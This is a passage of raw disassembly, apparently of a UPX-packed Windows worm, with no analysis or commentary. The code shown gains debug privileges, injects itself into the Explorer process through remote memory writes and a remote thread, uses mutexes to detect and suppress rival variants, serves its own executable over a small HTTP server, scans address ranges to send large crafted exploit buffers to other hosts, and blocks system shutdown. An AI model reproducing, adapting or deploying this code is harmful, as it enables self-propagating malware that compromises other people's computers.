call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A8h
push offset dword_3142460C
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0DEh
push offset dword_314246B8
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp eax, 46h
jl loc_31421D4C
cmp [ebp+var_730], 31h
jnz loc_31421BF7
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
push offset byte_314242B8
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31422CE2 ; memcpy
mov eax, dword_31424BBE
add esp, 0Ch
mov [ebp+var_798], eax
loc_31421A98: ; CODE XREF: sub_31421801+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 68h
push offset dword_314247FC
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A0h
push offset dword_31424868
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp [ebp+arg_0], 0
jz loc_31421CE7
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31424A20
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31422CE2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31424A8C
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31422CE2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31424B00
push eax
call sub_31422CE2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31421D3F
; ---------------------------------------------------------------------------
loc_31421BF7: ; CODE XREF: sub_31421801+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31422CD6 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31424BF8
push eax
call sub_31422CE2 ; memcpy
push offset byte_314242B8
call sub_31422CDC ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31424C70
push eax
call sub_31422CE2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31424BF8
push eax
call sub_31422CE2 ; memcpy
add esp, 40h
push offset byte_314242B8
call sub_31422CDC ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31421C93: ; CODE XREF: sub_31421801+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31421C93
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31422CD6 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31422CD6 ; memset
add esp, 18h
jmp loc_31421A98
; ---------------------------------------------------------------------------
loc_31421CE7: ; CODE XREF: sub_31421801+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_3142490C
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31422CE2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_3142498C
push eax
call sub_31422CE2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31421D3F: ; CODE XREF: sub_31421801+3F1�j
push eax
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
and [ebp+var_C], 0
loc_31421D4C: ; CODE XREF: sub_31421801+1AD�j
; sub_31421801+1E1�j ...
push 2
push [ebp+var_4]
call dword_31421170 ; shutdown
loc_31421D57: ; CODE XREF: sub_31421801+166�j
push [ebp+var_4]
call dword_31421174 ; closesocket
pop esi
loc_31421D61: ; CODE XREF: sub_31421801+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31421801 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421D68 proc near ; CODE XREF: UPX0:loc_31422376�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_314210A8 ; LoadLibraryA
mov esi, dword_314210A4
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_4], eax
jz short loc_31421DEC
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_8], eax
jz short loc_31421DEC
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; dword_314210A4
mov esi, eax
test esi, esi
jz short loc_31421DEC
lea eax, [ebp+var_C]
push eax
push 20h
call dword_314210A0 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31421DEC: ; CODE XREF: sub_31421D68+28�j
; sub_31421D68+37�j ...
pop edi
pop esi
leave
retn
sub_31421D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421DF0 proc near ; CODE XREF: UPX0:3142238A�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31425000
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_314210B4 ; GetModuleHandleA
mov esi, dword_314210A4
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31421E37
loc_31421E33: ; CODE XREF: sub_31421DF0+54�j
push 1
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E37: ; CODE XREF: sub_31421DF0+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_14], eax
jz short loc_31421E33
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31421110 ; FindWindowA
test eax, eax
jnz short loc_31421E65
call dword_31421114 ; GetForegroundWindow
test eax, eax
jnz short loc_31421E65
push 2
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E65: ; CODE XREF: sub_31421DF0+65�j
; sub_31421DF0+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31421118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_314210B0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31421E8B
push 3
loc_31421E88: ; CODE XREF: sub_31421DF0+45�j
; sub_31421DF0+73�j
pop eax
jmp short loc_31421EF6
; ---------------------------------------------------------------------------
loc_31421E8B: ; CODE XREF: sub_31421DF0+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3142107C
test eax, eax
jz short loc_31421EE9
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_314210AC ; WriteProcessMemory
push dword_31424FF4
call esi ; dword_3142107C
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31421ED5
push eax
call esi ; dword_3142107C
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421ED5: ; CODE XREF: sub_31421DF0+DE�j
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov [ebp+var_4], 5
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421EE9: ; CODE XREF: sub_31421DF0+B2�j
mov [ebp+var_4], 4
loc_31421EF0: ; CODE XREF: sub_31421DF0+E3�j
; sub_31421DF0+F7�j
push ebx
call esi ; dword_3142107C
mov eax, [ebp+var_4]
loc_31421EF6: ; CODE XREF: sub_31421DF0+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421EFB proc near ; CODE XREF: sub_314221C4+B�p
; UPX0:3142234C�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_314210B8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_314210EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421EFB endp
; =============== S U B R O U T I N E =======================================
sub_31421F29 proc near ; CODE XREF: sub_31421DF0+EA�p
; UPX0:31422356�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_314210BC ; CreateMutexA
retn
sub_31421F29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F38 proc near ; CODE XREF: sub_314223B2+155�p
; sub_314223B2+160�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0 ; CreateThread
pop ebp
retn
sub_31421F38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F52 proc near ; CODE XREF: sub_314221C4+12C�p
; sub_314225C3+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0 ; CreateThread
push eax
call dword_3142107C ; CloseHandle
pop ebp
retn
sub_31421F52 endp
; =============== S U B R O U T I N E =======================================
sub_31421F73 proc near ; CODE XREF: sub_314211A0+68�p
; sub_31422A9B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31421F9B
loc_31421F84: ; CODE XREF: sub_31421F73+26�j
call dword_314210FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31421F84
loc_31421F9B: ; CODE XREF: sub_31421F73+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31421F73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FA3 proc near ; CODE XREF: sub_314211A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31422CD6 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_314210C4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3142107C
mov edi, eax
call esi ; dword_3142107C
push [ebp+var_10]
call esi ; dword_3142107C
mov eax, edi
pop edi
pop esi
leave
retn
sub_31421FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FF9 proc near ; CODE XREF: sub_3142264B+3E�p
; sub_31422712+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3142114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_3142201A
call dword_31421150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_3142201A: ; CODE XREF: sub_31421FF9+15�j
lea eax, [ebp+var_34]
push eax
call dword_31421154 ; gethostbyname
test eax, eax
jnz short loc_3142202F
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_3142202F: ; CODE XREF: sub_31421FF9+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31421FF9 endp
; =============== S U B R O U T I N E =======================================
sub_31422038 proc near ; CODE XREF: sub_314216A2+12�p
; sub_3142255F+22�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31421130 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31422038 endp
; =============== S U B R O U T I N E =======================================
sub_3142204E proc near ; CODE XREF: sub_314223B2+E6�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_314210CC ; OpenEventA
test eax, eax
jz short locret_31422067
push eax
call dword_314210C8 ; SetEvent
locret_31422067: ; CODE XREF: sub_3142204E+10�j
retn
sub_3142204E endp
; =============== S U B R O U T I N E =======================================
sub_31422068 proc near ; CODE XREF: sub_314216A2+68�p
push esi
mov esi, dword_314210FC
push edi
call esi ; dword_314210FC
mov edi, eax
shl edi, 10h
call esi ; dword_314210FC
or eax, edi
pop edi
pop esi
retn
sub_31422068 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142207E proc near ; DATA XREF: sub_314221C4+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_314220AF
push 1
jmp loc_3142216A
; ---------------------------------------------------------------------------
loc_314220AF: ; CODE XREF: sub_3142207E+28�j
mov esi, dword_31421104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; dword_31421104
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
lea eax, [ebp+var_100]
push offset dword_314241F0
push eax
call esi ; dword_31421104
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
mov esi, dword_31421168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; dword_31421168
push dword_31424FF0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31422CDC ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; dword_31421168
loc_3142212C: ; CODE XREF: sub_3142207E+E8�j
mov eax, dword_31424FF0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_3142213E
mov eax, ecx
loc_3142213E: ; CODE XREF: sub_3142207E+BC�j
test eax, eax
jz short loc_3142216D
push 0
push eax
mov eax, dword_31424FE8
add eax, edi
push eax
push ebx
call esi ; dword_31421168
cmp eax, 0FFFFFFFFh
jz short loc_31422168
cmp eax, 1000h
jb short loc_3142216D
push 64h
add edi, eax
call dword_31421094 ; Sleep
jmp short loc_3142212C
; ---------------------------------------------------------------------------
loc_31422168: ; CODE XREF: sub_3142207E+D5�j
push 2
loc_3142216A: ; CODE XREF: sub_3142207E+2C�j
pop eax
jmp short loc_314221BD
; ---------------------------------------------------------------------------
loc_3142216D: ; CODE XREF: sub_3142207E+C2�j
; sub_3142207E+DC�j
push offset dword_31424FEC
call dword_314210D4 ; InterlockedIncrement
jmp short loc_31422198
; ---------------------------------------------------------------------------
loc_3142217A: ; CODE XREF: sub_3142207E+49�j
; sub_3142207E+61�j
mov esi, dword_31421168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; dword_31421168
push 0
push 3
push offset dword_31424D38
push ebx
call esi ; dword_31421168
loc_31422198: ; CODE XREF: sub_3142207E+FA�j
push 7D0h
call dword_31421094 ; Sleep
push 2
push ebx
call dword_31421170 ; shutdown
push ebx
call dword_31421174 ; closesocket
push 0
call dword_314210D0 ; ExitThread
xor eax, eax
loc_314221BD: ; CODE XREF: sub_3142207E+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3142207E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314221C4 proc near ; DATA XREF: sub_314223B2+150�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31421EFB
lea eax, [ebp+var_130]
push 104h
push eax
push offset aCryptographicS ; "Cryptographic Service"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31424FEC, ebx
call sub_31422882
add esp, 14h
test eax, eax
jnz loc_314222F9
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_31421080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31422230
push 1
call dword_314210D0 ; ExitThread
loc_31422230: ; CODE XREF: sub_314221C4+62�j
push ebx
push esi
call dword_314210DC ; GetFileSize
push eax
mov dword_31424FF0, eax
call sub_31422CA5
pop ecx
mov dword_31424FE8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31424FF0
push eax
push esi
call dword_314210D8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31424FF0, eax
call dword_3142107C ; CloseHandle
push ebx
push 1
push 2
call dword_31421158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31422292: ; CODE XREF: sub_314221C4+E5�j
; sub_314221C4+ED�j ...
call dword_314210FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31424FFC, eax
jz short loc_31422292
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31422292
push eax
call dword_31421160 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31421140 ; bind
test eax, eax
jnz short loc_31422292
push 64h
push edi
call dword_31421144 ; listen
mov [ebp+var_8], esi
pop esi
loc_314222DB: ; CODE XREF: sub_314221C4+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31421148 ; accept
push eax
push offset sub_3142207E
call sub_31421F52
pop ecx
pop ecx
jmp short loc_314222DB
; ---------------------------------------------------------------------------
loc_314222F9: ; CODE XREF: sub_314221C4+3D�j
push ebx
call dword_314210D0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_314221C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422308 proc near ; CODE XREF: sub_314223B2:loc_314224FC�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3142113C
push eax
push 2
call esi ; dword_3142113C
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; dword_3142113C
pop esi
leave
retn
sub_31422308 endp
; ---------------------------------------------------------------------------
loc_31422334: ; CODE XREF: UPX1:31427D08�j
push 0
call dword_314210B4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31425000, eax
call dword_31421074 ; DeleteFileA
call sub_31421EFB
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
call dword_314210E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31422376
push 1
call dword_314210E0 ; ExitProcess
loc_31422376: ; CODE XREF: UPX0:3142236C�j
call sub_31421D68
call sub_314229E6
call sub_31422B67
push offset sub_314223B2
call sub_31421DF0
test eax, eax
pop ecx
jz short loc_3142239B
push 0
call sub_314223B2
loc_3142239B: ; CODE XREF: UPX0:31422392�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_3142239E proc near ; CODE XREF: sub_314223B2:loc_31422525�p
; sub_3142255F:loc_31422578�p ...
push 0
push dword_31424FF8
call dword_31421070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_3142239E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314223B2 proc near ; CODE XREF: UPX0:31422396�p
; DATA XREF: UPX0:31422385�o
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421190
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 64h
push ebx
push esi
push edi
mov [ebp+var_70], offset aU10x ; "u10x"
mov [ebp+var_6C], offset aU11x ; "u11x"
mov [ebp+var_68], offset aU12x ; "u12x"
mov [ebp+var_64], offset aU13x ; "u13x"
mov [ebp+var_60], offset aU14x ; "u14x"
mov [ebp+var_5C], offset aU15x ; "u15x"
mov [ebp+var_58], offset aU16x ; "u16x"
mov [ebp+var_54], offset aU17x ; "u17x"
mov [ebp+var_50], offset aU18x ; "u18x"
mov [ebp+var_4C], offset aU8 ; "u8"
mov [ebp+var_48], offset aU9 ; "u9"
mov [ebp+var_44], offset aU10 ; "u10"
mov [ebp+var_40], offset aU11 ; "u11"
mov [ebp+var_3C], offset aU12 ; "u12"
mov [ebp+var_38], offset aU13 ; "u13"
mov [ebp+var_34], offset aU13i ; "u13i"
mov [ebp+var_30], offset aU14 ; "u14"
mov [ebp+var_2C], offset aU15 ; "u15"
mov [ebp+var_28], offset aU16 ; "u16"
mov [ebp+var_24], offset aU17 ; "u17"
mov [ebp+var_20], offset aU18 ; "u18"
mov [ebp+var_1C], offset aU19 ; "u19"
push offset aU19x ; "u19x"
xor edi, edi
push edi
push 1
push edi
call dword_3142106C ; CreateEventA
mov dword_31424FF8, eax
mov [ebp+var_4], edi
mov [ebp+var_74], edi
loc_3142248B: ; CODE XREF: sub_314223B2+EF�j
cmp [ebp+var_74], 9
jnb short loc_314224A3
mov eax, [ebp+var_74]
push [ebp+eax*4+var_70]
call sub_3142204E
pop ecx
inc [ebp+var_74]
jmp short loc_3142248B
; ---------------------------------------------------------------------------
loc_314224A3: ; CODE XREF: sub_314223B2+DD�j
mov [ebp+var_74], edi
loc_314224A6: ; CODE XREF: sub_314223B2+10A�j
cmp [ebp+var_74], 0Dh
jnb short loc_314224BE
mov eax, [ebp+var_74]
push [ebp+eax*4+var_4C]
call sub_31421F29
pop ecx
inc [ebp+var_74]
jmp short loc_314224A6
; ---------------------------------------------------------------------------
loc_314224BE: ; CODE XREF: sub_314223B2+F8�j
cmp [ebp+arg_0], edi
jz short loc_314224FC
push offset aWs2_32 ; "ws2_32"
mov esi, dword_314210A8
call esi ; dword_314210A8
push offset aWininet ; "wininet"
call esi ; dword_314210A8
push offset aMsvcrt ; "msvcrt"
call esi ; dword_314210A8
push offset aAdvapi32 ; "advapi32"
call esi ; dword_314210A8
push offset aUser32 ; "user32"
call esi ; dword_314210A8
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
loc_314224FC: ; CODE XREF: sub_314223B2+10F�j
call sub_31422308
push edi
push offset sub_314221C4
call sub_31421F38
push edi
push offset sub_314216A2
call sub_31421F38
push edi
push offset loc_3142276E
call sub_31421F38
add esp, 18h
loc_31422525: ; CODE XREF: sub_314223B2+18E�j
call sub_3142239E
test eax, eax
jnz short loc_31422542
push edi
call dword_31421018 ; AbortSystemShutdownA
push 1388h
call dword_31421094 ; Sleep
jmp short loc_31422525
; ---------------------------------------------------------------------------
loc_31422542: ; CODE XREF: sub_314223B2+17A�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_314223B2 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142255F proc near ; DATA XREF: sub_314225C3+55�o
; sub_3142264B+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_3142256E
push 1
pop eax
jmp short locret_314225BF
; ---------------------------------------------------------------------------
loc_3142256E: ; CODE XREF: sub_3142255F+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_31422578: ; CODE XREF: sub_3142255F+5A�j
call sub_3142239E
test eax, eax
jnz short loc_314225BB
call sub_31422038
test eax, eax
jz short loc_314225BB
cmp [ebp+var_1], bl
jz short loc_314225B4
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31421801
movzx esi, word_3142500C
pop ecx
call dword_314210FC ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_31421094 ; Sleep
loc_314225B4: ; CODE XREF: sub_3142255F+2E�j
inc bl
cmp bl, 0FFh
jb short loc_31422578
loc_314225BB: ; CODE XREF: sub_3142255F+20�j
; sub_3142255F+29�j
pop esi
xor eax, eax
pop ebx
locret_314225BF: ; CODE XREF: sub_3142255F+D�j
leave
retn 4
sub_3142255F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314225C3 proc near ; DATA XREF: sub_3142264B+7E�o
; UPX0:31422803�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_314225D1
push 1
pop eax
jmp short loc_31422647
; ---------------------------------------------------------------------------
loc_314225D1: ; CODE XREF: sub_314225C3+7�j
push ebx
push esi
push edi
call sub_31421EFB
mov esi, dword_314210FC
xor ebx, ebx
loc_314225E1: ; CODE XREF: sub_314225C3+7D�j
call sub_3142239E
test eax, eax
jnz short loc_31422642
call sub_31422038
test eax, eax
jz short loc_31422642
call esi ; dword_314210FC
mov byte ptr [ebp+arg_0+2], al
